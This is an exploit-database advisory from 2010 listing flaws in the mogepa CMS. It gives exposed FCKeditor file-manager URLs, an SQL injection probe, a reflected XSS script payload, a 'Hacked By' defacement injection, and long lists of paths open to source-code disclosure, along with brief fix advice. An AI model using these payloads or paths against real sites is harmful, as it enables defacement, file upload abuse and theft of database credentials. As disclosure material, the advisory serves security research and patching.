mogepa Cms Multiple Vulnerabilities

Posted on 27 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>mogepa Cms Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================
mogepa Cms Multiple Vulnerabilities
===================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ &gt;&gt; Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor:  http://mogepa.altervista.org/

# Date: 2010-05-27 

# Author : indoushka 

# R.I.P : www.Milw0rm.com,www.Tryag.cc,www.dz-security.com ! 

# Contact : 00213771818860

# Home : www.is3cur1ty.com

# Bug  : Mullti

# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

FcKeditor Uploader :

1 - http://127.0.0.1/mogepa/admin/fckeditor/editor/filemanager/connectors/

Sample displays a normal HTML form with an FCKeditor - JavaScript  with full features enabled

2 - http://127.0.0.1/mogepa/admin/fckeditor/_samples/default.html

    http://127.0.0.1/mogepa/admin/fckeditor/

SQL injection

3 - http://127.0.0.1:80/mogepa/?p=%2527

XSS 

4 - http://127.0.0.1/mogepa/?p=indoushka@hotmail&lt;ScRiPt%20%0d%0a&gt;alert(213771818860)%3B&lt;/ScRiPt&gt;.com

(SQl/html)

5 - http://127.0.0.1/mogepa/admin/login.php/&gt;&quot;&gt;&lt;marquee&gt;&lt;font%20color=red%20size=15&gt;Hacked%20By%20indoushka&lt;/font&gt;&lt;/marquee&gt;

6 - 8.3 DOS filename source code disclosure

Vulnerability description:

It's possible to access the source code for this script by using the 8.3 DOS filename notation. 
All 32-bit Microsoft Windows operating systems (commonly known as Win32) can associate two different file names with a stored file, a short name and a long name. The short version, known as 8.3-compliant, is restricted to a length of 8 characters and an extension of 3 characters. This version is required for backward compatibility with DOS. The long version of the file name is not restricted to the 8.3-compliant format but is restricted to a total length of 255 characters.
When Win32 stores a file with a short name (i.e., 8.3-compliant), it associates only that short file name with the file. However, when Win32 stores a file with a long name (i.e., greater than 8 characters), it associates two versions of the file name with the file--the original, long file name and an 8.3-compliant short file name that is derived from the long name in a predictable manner.

Affected items:

/mogepa/admin/fckeditor/_samples/asp/SAMPLE~1.ASP 
/mogepa/admin/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/SPELLC~1.PL 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CLASS_~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CONFIG.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/IO.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/UPLOAD.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/UTIL.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/CONNEC~1.CGI 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/UPLOAD.CGI 
/mogepa/admin/fckeditor/FCKEDI~1.ASP 

The impact of this vulnerability:

An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.

How to fix this vulnerability:

Install the latest patches on your server.

7 - Source code disclosure:

Vulnerability description:

Looks like the source code for this script is available. This check is using pattern matching to determine if server side tags are found in the file. In some cases this alert may generate false positives. 

Affected items:

/mogepa/admin/fckeditor/_samples/afp/fck.afpa.code 
/mogepa/admin/fckeditor/_samples/afp/sample01.afp 
/mogepa/admin/fckeditor/_samples/afp/sample02.afp 
/mogepa/admin/fckeditor/_samples/afp/sample03.afp 
/mogepa/admin/fckeditor/_samples/afp/sample04.afp 
/mogepa/admin/fckeditor/_samples/afp/sampleposteddata.afp 
/mogepa/admin/fckeditor/_samples/asp/SAMPLE~1.ASP 
/mogepa/admin/fckeditor/_samples/asp/sample01.asp 
/mogepa/admin/fckeditor/_samples/asp/sample02.asp 
/mogepa/admin/fckeditor/_samples/asp/sample03.asp 
/mogepa/admin/fckeditor/_samples/asp/sample04.asp 
/mogepa/admin/fckeditor/_samples/asp/sampleposteddata.asp 
/mogepa/admin/fckeditor/_samples/perl/sample01.cgi 
/mogepa/admin/fckeditor/_samples/perl/sample02.cgi 
/mogepa/admin/fckeditor/_samples/perl/sample03.cgi 
/mogepa/admin/fckeditor/_samples/perl/sample04.cgi 
/mogepa/admin/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/SPELLC~1.PL 
/mogepa/admin/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.pl 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/basexml.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CLASS_~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/class_upload.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/commands.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/config.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp (GET Command=GetFolders&amp;Type=File&amp;CurrentFolder=/) 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp (GET Command=GetFoldersAndFiles&amp;Type=File&amp;CurrentFolder=/) 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/io.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/util.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/config.ascx 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/CONNEC~1.CGI 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/connector.cgi 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/upload.cgi 
/mogepa/admin/fckeditor/FCKEDI~1.ASP 
/mogepa/admin/fckeditor/fckeditor.afp 
/mogepa/admin/fckeditor/fckeditor.asp 

The impact of this vulnerability:

An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to conduct further attacks.

How to fix this vulnerability:

Remove this file from your website or change its permissions to remove access.

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20